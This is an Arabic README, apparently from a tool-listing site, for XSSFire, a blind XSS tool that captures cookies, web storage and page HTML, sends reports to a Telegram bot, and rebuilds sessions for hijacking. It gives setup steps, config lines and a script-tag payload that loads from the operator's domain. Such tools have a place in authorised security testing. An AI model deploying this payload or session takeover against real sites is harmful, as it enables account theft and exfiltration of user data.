السكريبت عبارة عن مزيج بين PHP و JavaScript، حيث يلتقط البيانات باستخدام JS ويرسلها إلى السكريبت نفسه، ثم ينشئ ملفات تقارير ويُسلّمها عبر تيليجرام.
المتطلبات:
خادم ويب يعمل على Linux مع نطاق وشهادة SSL.
حساب تيليجرام (لاستقبال تقارير BXSS)
لماذا تيليجرام؟
سهل الإعداد.
سريع.
يسهل الوصول إليه.
الميزات:
يلتقط: IP، User-Agent، Date-Time، Local Storage، Session Storage، Cookies، Referrer، Origin، URL، HTML، إذا تم التشغيل من Iframe
منشئ الجلسة: JavaScript يمكنه إعادة بناء الجلسة، افتح الرابط المُلتقط وأدوات المطوّر ثم الصق الكود في الكونسول واضغط Enter. إذا كنت محظوظًا بما يكفي يمكنك الاستيلاء على الجلسة.
إشعارات تيليجرام: أسرع وأسهل في الإعداد من البريد الإلكتروني وأكثر وصولًا.
مضاد للبريد العشوائي: يجب أن تستقبل إشعارًا واحدًا أو اثنين فقط لكل رابط تم التقاطه. ومع ذلك، يعيد السكريبت ضبط نفسه بين الحين والآخر ليُعلمك مرة أخرى لاحقًا.
التشفير: يمكنك تعيين كلمة مرور في السكريبت، وسيكون التقرير الذي تستلمه في تيليجرام ملف zip محميًا بكلمة مرور. (لا تستخدم بوتات تيليجرام تشفيرًا من طرف إلى طرف).
لقطة HTML: عبارة عن ملف HTML يتم تسليمه مع التقرير، ويجب أن يبدو مشابهًا لصفحة هدفك.
الإعداد:
اذهب إلى تيليجرام وتحدث مع @botfather.
اكتب /start في المحادثة وأنشئ بوتًا جديدًا.
يجب أن تستلم رمز البوت الخاص بك عند إنشائه.
احفظ الرمز جانبًا.
الآن اذهب إلى محادثة البوت الذي أنشأته للتو وابدأه ثم ألقِ التحية.
ثم انتقل إلى: https://api.telegram.org/bot<bot_token>/getUpdates
واحفظ معرّف المحادثة الخاص بك.
افتح سكريبت XSSFire وعدّل الأسطر التالية:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
ملاحظة: يمكنك تغيير اسم الملف إلى index.php ورفعه إلى الدليل الرئيسي لخادمك لجعل الحمولات أقصر، وعندها سيبدو الرابط مشابهًا لهذا <script src="https://yourdomain.com"></script>.